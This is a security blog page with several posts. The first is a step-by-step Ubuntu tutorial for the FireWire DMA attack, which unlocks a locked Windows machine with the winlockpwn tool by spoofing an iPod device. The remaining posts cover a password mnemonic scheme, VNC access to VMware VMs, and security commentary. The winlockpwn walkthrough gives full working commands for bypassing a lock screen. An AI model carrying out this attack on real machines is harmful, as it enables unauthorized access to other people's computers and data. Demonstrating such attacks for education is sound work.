Posted by & filed under Hacking & Pentesting, Hacks, Tools & Methodology.

Update: I’ve released a tool at github called Inception, which uses libforensic1394 to unlock Windows XP, Vista and Windows 7 boxes. IMNSHO, it is much more stable than winlockpwn, easier to use and works against a wider spectrum of target operating systems.

Quite regularly I’m being asked to demonstrate the FireWire attack made by MetlStorm aka Adam Boileau (http://www.storm.net.nz/projects/16 [site down as of May 20]) where an attacker unlocks a Windows machine by writing to the victim machine’s memory via FireWire. It’s kind of a party trick hack, but it never stops to amaze people. A couple of days ago I demonstrated the trick at AFSecurity, and I was asked if it was easy to find a good description on how to do it.

Well, sort of. There’s an excellent guide here, but several of the commands does not work out of the box on Ubuntu anymore, so I’ve created this little tutorial. All hail to Tim for creating the original. Also, the original source of the tool have disappeared from the net, so I’ve started hosting my own version of the tool right here. Metlstorm, if you read this, apologies in advance. Let me buy you a beer sometime! Or get your site up again :-)

So here’s how to do the hack on Ubuntu 11.04 (Natty Narwhal) Ubuntu 10.10 (Maverick Meerkat):

(Update: According to this thread, the raw1394 device is no longer supported as of Ubuntu 11.04, I’ll try to figure out how to use the tool with the new FireWire stack (JuJu)).

Get the dependencies

First, get the stuff we need to be able to compile the winlockpwn tool and necessary FireWire driver:

sudo apt-get install build-essential linux-headers-$(uname -r) libdc1394-22 libraw1394-dev swig

Secondly, we need to download and compile Python 2.3:

wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar xvfz Python-2.3.6.tgz
cd Python-2.3.6
./configure

Now, since this old python version has several potential buffer overflow vulnerabilities, we have to tell gcc to quietly ignore them by editing the Makefile. Open the makefile in your favourite text editor, and change the following lines:

BASECFLAGS=      -fno-strict-aliasing

To:

BASECFLAGS=      -fno-strict-aliasing -fno-stack-protector -U_FORTIFY_SOURCE

Then compile and make an alternative install (that will make the new (old) python libraries co-reside nicely with your existing python libraries):

make
sudo make altinstall

Fix up the libraw1394:

sudo vim /usr/include/libraw1394/raw1394.h

Search for and comment out all references to the ‘__attribute__ ((deprecated));’ and be sure to put an ending semicolon on the previous line.

Download and install winlockpwn

Since Adam Bolieu’s site is down, I’ve taken the liberty of hosting the tool files here. I’ve also added some more csr’s and signatures for Windows XP SP3, Vista 32 and 64-bit, Ubuntu 9.04 and Windows 7 32 and 64-bit. Woohoo!

wget http://www.breaknenter.org/files/winlockpwn/pythonraw1394-1.0.tar.gz
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
wget http://www.breaknenter.org/files/winlockpwn/winlockpwn
chmod +x ./winlockpwn
vim Makefile (reference /usr/local/bin/python2.3 instead of /usr for python)
make

Unload the default Ubuntu FireWire drivers and load your own:

sudo modprobe -r firewire_ohci
sudo modprobe -r firewire_core
sudo modprobe ohci1394
sudo modprobe raw1394

Give write permissions to the firewire device:

sudo chmod 666 /dev/raw1394

Edit the first line of the files romtool, businfo and winlockpwn to reference the python 2.3 location as installed above, then load the ipod image (or any of the other csr’s) to the firewire port:

sudo ./romtool -s 0 ipod.csr

Run businfo to check the port configurations:

sudo ./businfo

Check the node list. Node 0 is the Windows machine, node 1 should be the fake iPod. Connect to the Windows machine using a firewire cable, and watch as Windows loads the firewire drivers, recognizes the iPod and gives it DMS. At last, run winlockpwn (example parameters below):

sudo ./winlockpwn 0 0 2

You can get a quick explanation of the winlockpwn parameters by running the command without parameters. If you’re having trouble getting DMA access, try some of the other ROM csr’s. Also, verify that no other firewire drivers (than the ones loaded above) are present by issuing the following commands:

lsmod | grep 1394
lsmod | grep firewire

Posted by & filed under /dev/random.

A couple of weeks ago I started using the CloudFlare service for Break & Enter, and I’m thrilled about the result. Reduced latency, protection from spammers and bots and my own, shared, cloud-based CDN are just some of the benefits. Highly recommended!

My only hiccup with  CloudFlare so far is its inability to serve the WPTouch mobile theme to iPhones and other mobile devices. Not sure who to blame, anyone else had the same problem?

Posted by & filed under /dev/random.

I’m delighted to be invited/having imposed myself to speak at the Passwords^11 conference in Bergen, Norway next week! I’ll be speaking on June 8 0915 about my master’s thesis and demonstrate how to crack whole-disk encryption on laptops using the coldboot attack. Maybe I’ll throw in some other hardware-based attacks as well. Abstract is on its way.

If you need a good excuse to see the fjords in Norway or just sip some ridiculously expensive beer, here’s your chance: Register now!

Password prompt

Posted by & filed under /dev/random.

How many times a day do you have to type in your passwords? It’s a pesky business remembering all of them, and even though there’s many different types of software that can keep track of passwords, you still have to type them in places where the software doesn’t work, like at your laptop log on prompt.

So what’s my take on this? I use personal goals as passwords. Not the goals themselves of course, but most of my passwords are derived from personal goals.

Why? Well, this may seem silly, but if you google “how to achieve your goals” every article seems to agree that you should to write your goals down, or otherwise visualize them daily. By using passwords that are derivations of real-life challenges and goals, I have to repeat them to myself (not aloud, of course) each time I use them, which is often several times a day. That way, my goals stay in focus, and at the same time, it makes it easier for me to remember the actual password.

This is best illustrated by an example: Let’s say that I have a goal of achieving a CISSP certification by August 2011. I’ll then formulate a sentence (basically a mnemonic) based on this goal, and derive a password from it. For example:

“I’ll succeed at the CISSP exam and gain certification by August 2011″

becomes the password:

I’llsatCe&gcbA11

By swapping certain words for non-aphanumeric characters and Capitalized letters I make sure that the password has the right complexity. By using a long sentence I make sure that the password has a sufficient length, in this case 16 characters.

Cracking this password is hard, even if you know how I use my goals as mnemonics for passwords. If we assume that I’m using all 95 characters in the printable part of the ASCII character set as an alphabet, the strength of the password should be strong enough for most appliances.

But the real treat is as mentioned that I force myself to repeat my goals in order to remember the password each time I type it in, and that both makes it easier for me to remember it, and, as a side effect, makes my goals stay in focus.

Of course, random passwords are still best. But I find this method to be a reasonable trade-off between usability and security.

Now excuse me, I’ll have to go change all my passwords.

Posted by & filed under /dev/random.

I’m speaking about endpoint security and mobility in the upcoming AFSecurity seminar at the University of Oslo 20 May, and I can promise some juicy demonstrations.

From the site:

Academic Forum on Security is a collaborative meeting place in the Oslo area with focus on current issues and research questions related to information security. AFSecurity is organised in collaboration between IfI (Department of Informatics) and FFI (The Defence Research Establishment).

Looking forward to it!

Posted by & filed under Security News.

Several sources reported that the commando team that killed Bin Laden made a perhaps equally important discovery in the Abbottabad recidence: Data.

Disks, hard drives and computers were seized as a part of the operation, and even though the compound did not have a (wired?) Internet connection or phone lines, the data on these media are, of course, potentially extremely valuable to US intelligence.

al-Quaeda has been known to use encryption before, so it’s not entirely sure that the plethora of digital forensics experts (that are beyond all doubt hammering the disks with all their skills as I write) will come up with anything useful – nor is it certain that the disks contains any useful data at all. Maybe old Osama just fancied playing minesweeper.

Even if encryption is in use, it’s still a question of what kind of encryption that are utilized, where it is utilized and how it is utilized.

  • What kind of encryption: Weak encryption has been used before, and there’s plenty of examples of XOR-ciphers being touted as “military grade encryption”. A strong encryption scheme uses a scrutinized encryption algorithm (like AES, RSA, Serpent, Twofish, etc.)  that are correctly implemented, with a secure key bit length.
  • Where it is utilized: Encryption can be used to protect data, but it is up to the user to select what data he/she wants to protect. You can choose to encrypt files, partitions, disks, whatever that contains data. Depending on the selection, copies sensitive data may reside on unencrypted files, partitions, swap space, other disks or other media.
  • How it is utilized: There’s plenty of examples of users choosing bad passwords or otherwise compromise their encryption scheme by using it incorrectly. One prime example is letting a computer that utlilized Full Disk Encryption (FDE) being seized while it’s powered on or in standby mode, potentially allowing access to the data.

Nevertheless, the weakest link in encryption cases are often the password. Time will show if Bin Laden was as careful with his data as he was with his own physical protection.

Posted by & filed under Security News.

Found an interresting article about the recent RSA hack, seems that the threat agents in this case was both advanced and persistent. It smells like an intelligence operation to be honest, and it goes to show how hard it is to safeguard against an advanced enemy with the means and stamina to pull off advanced attacks.

To me, the hack looks like a blunt demonstration of hacking prowess. “Look what we can do” is written all over it; showing off that one can break into one of the worlds most prominent security cooperations should be sufficient to send shivers down the spines of many government officials.

Posted by & filed under Hacks, Tools & Methodology.

VMware has for a long time shown a blatant disrespect for its Mac customer base by not providing a decent method of accessing Virtual Machines (VMs) from OS X.

The VMware Infrastructure (VI) Client is .Net-based and cannot easily be run from OS X, and the browser plugins does not work with Safari or Firefox (on OS X). There has been a wide range of creative ways of bypassing this ridiculous restriction (among others using another VM as base for launching the VI client), as well as a public “uproar” to witch VMware has decided to turn its deaf ear.

VMware server and ESXi are great products, but not being able to access to my VMs from my Macbook is, to be honest, a huge pain in the *ss. So here’s a simple way of accessing all your VMs consoles directly from the finder in Mac OS X. It will also enable VM access on the iPad/iPhone through VNC apps such as iTeleport. The final result of this tutorial will lead you to a finder that looks something like this, with all your VMs from your VMware Server/ESXi lined up for easy VNC remote desktop access:


You can then easily connect to all of your virtual machines directly from your finder/iPad/iPhone! You have access to all the features of the VI client, including low-level stuff like BIOS, etc. The guide should work with few modifications for other host- and client OSes.

You’ll still need to use the VMware Infrastructure Web Access interface to manage (start/stop/take snapshot/etc.) your VMs. As of Mach 18th, you can also use the VMWare vSphere iPad app to do this.

IMNSHO, this is a much better way of remote access than the hacks mentioned above and other places at the Internet, as it doesn’t involve any client or server-side virtualization. In other words, you don’t need to buy VMware Fusion or struggle with X11 forwarding over SSH to make it work, and it’s far less resource intensive. It’s also less cumbersome than installing VNC in each VM. Finally, it enables access on all devices that supports VNC which is pretty much any OS out there!

Getting started

The ingredients:

  • VMware Server (the guide should work for ESXi as well, but you’ll have to configure it through the VI client, so a bit of a catch-22 there) (host), I’ve used Ubuntu as the host system in this guide
  • A Mac with OS X (other OSes should also work, but you’ll need a VNC client) or a mobile device with a VNC client connected to the same LAN/WLAN as the host
  • An Internet connection
  • Ability to type some commands in the terminal (do not fear, the commands will be provided)

That’s it! Let’s get started.

Enable VNC to the virtual machines

To enable VNC access to a virtual machine, log into your VMware Infrastructure Web Access at:

https://[your ip/hostname]/ui/

Once in, select the machine you want to access from the Inventory, power it off if its on, and select Configure VM from the Commands window under the Summary tab.

VMware Web Access - configure VM

Then click Add New Entry, and add the following lines:

  • RemoteDisplay.vnc.enabled = TRUE
  • RemoteDisplay.vnc.port = [port number]
    (The port number can be anything above port 1024, but VNC ports are commonly from 5901 and upwards. Note: You’ll need to supply a different port number for each VM you want to connect to.)
  • RemoteDisplay.vnc.password = [password]

I strongly suggest using a password. When done, you should have something like this:

Remember the port number (or write it down, for example in the VM notes in the Web Access interface). Click OK.

Now, let’s test the connection with OS X’s built-in VNC client (any other VNC client should work as well). In the Web Access interface, power on the VM.

On your client, open Finder and navigate to /System/Library/CoreServices. You should be able to find an application called Screen Sharing. Open it, and enter your host’s IP address or hostname and the port number you added to the VM configuration using the following syntax:

[ip address/hostname]:[port number]

In my example, this is what it looks like:


Note: It’s important that you connect to your host’s IP/hostname, not your VM. VMware Server “forwards” the VNC connection to the VM.

Click Connect, you should be asked for a password (if you set one), enter it, and voila:

Remotely access VM through Screen Sharing

Congratulations! You can now use the VM as a normal remote desktop. But you’re only halfway to total VMware console bliss. Stay tuned to see how you can make all your remote desktops magically appear in your Finder!

Magically turn your Finder into a VMware console (optional)

In order to make the virtual machines turn up in the finder as pictured above, you’ll need avahi/zeroconf installed at the host. This guide will cover how to install and configure avahi on Ubuntu.

First, install the avahi service:

sudo apt-get install avahi-daemon

Then configure avahi by adding services in /etc/avahi/services. Create a file (one for each virtual machine) and open it:

sudo gedit /etc/avahi/services/win-xp-sp2.service

Paste the following in gedit, and then substitute [VM name] with the VM name and [port number] with the port number set above, respectively:


<DOCTYPE service-group SYSTEM 'avahi-service.dtd'>
<service-group>
<name replace-wildcards='yes'>Windows XP SP2</name>
<service>
<type>_rfb._tcp</type>
<port>5902</port>
</service>
</service-group>

Save and close gedit, and restart avahi:

sudo service avahi-daemon restart

The virtual machine should now magically appear in your Finder if you’re on the same LAN/WLAN as you VMware server. To connect, simply hit Share screen… in the right top corner of your Finder window.

Congratulations, you can now use your Mac with VMware Server!

International only: How to fix keyboard issues

Are you having trouble with the key bindings in VNC? Change your keyboard in OS X to U.S., and set the keyboard to your appropriate model in the virtual machine. This should fix all wierd special characters that are unavailable or erroneously mapped.

You’ll have to switch keyboards at the client side each time you switch between working remote and local, though.

Update: In order to enable the right keymapping, add the following line to the VM configuration:

RemoteDisplay.vnc.keymap = “[keymap]”

Swap [keymap] with your appropriate keymap code.

Note to VMware

This guide is entirely unnecessary; I’m sure you easily could have listened to your paying customers and whipped up a VI Client for OS X in no time. Your move.

Posted by & filed under Security News.

I just saw Steve Jobs announce the new iPad (oooh, shiny, want one), and I’m impressed of the numbers he presented in the keynote: > 200 million users are now registered through the App Store. All with associated credit cards.

This is of course nice for Apple, but it is also raises some security concerns: 200 million credit cards (or user accounts to the App Store for that matter) is an attractive target for malicious Internet users.

And that’s just the App Store. The slow shift in the computer industry (from Microsoft and other vendors towards Apple) is going to cause some serious threat elevation for Apple products, the Apple malware discovered in the wild recently confirms this. There is also a shift in terms of mobility, which I think increases the risk of directed fire against Apple products even more.

While Apple probably encrypts credit card data in the App Store, I suspect that we’ll see more targeted attacks against Apple infrastructure and products in 2011. I hope someone in Cupertino is re-evaluating their risk assessments and takes security even more seriously, by for example implementing basic security features such as full ASLR in all Apple products asap.